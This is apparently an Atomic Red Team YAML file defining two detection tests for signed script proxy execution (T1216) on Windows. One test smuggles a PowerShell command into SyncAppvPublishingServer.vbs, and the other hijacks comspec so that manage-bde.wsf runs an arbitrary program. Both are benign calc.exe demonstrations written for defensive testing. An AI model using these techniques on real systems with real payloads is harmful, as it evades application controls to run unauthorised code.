Josh Rickard
a5dd0813cd
* fix: Updating atomics YAML file structure to align with the new JSON schema definition. This also fixes some white space issues and general line formatting across all impacted atomics. * fix: One additional change needed --------- Co-authored-by: MSAdministrator <MSAdministrator@users.noreply.github.com> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
38 lines
1.3 KiB
YAML
38 lines
1.3 KiB
YAML
attack_technique: T1216
|
|
display_name: Signed Script Proxy Execution
|
|
atomic_tests:
|
|
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
|
|
auto_generated_guid: 275d963d-3f36-476c-8bef-a2a3960ee6eb
|
|
description: |
|
|
Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command.
|
|
Upon execution, calc.exe will be launched.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
command_to_execute:
|
|
description: A PowerShell command to execute.
|
|
type: string
|
|
default: Start-Process calc
|
|
executor:
|
|
command: |
|
|
C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
|
|
name: command_prompt
|
|
- name: manage-bde.wsf Signed Script Command Execution
|
|
auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a
|
|
description: |
|
|
Executes the signed manage-bde.wsf script with options to execute an arbitrary command.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
command_to_execute:
|
|
description: A command to execute.
|
|
type: path
|
|
default: '%windir%\System32\calc.exe'
|
|
executor:
|
|
command: |
|
|
set comspec=#{command_to_execute}
|
|
cscript %windir%\System32\manage-bde.wsf
|
|
cleanup_command: |
|
|
set comspec=%windir%\System32\cmd.exe
|
|
name: command_prompt
|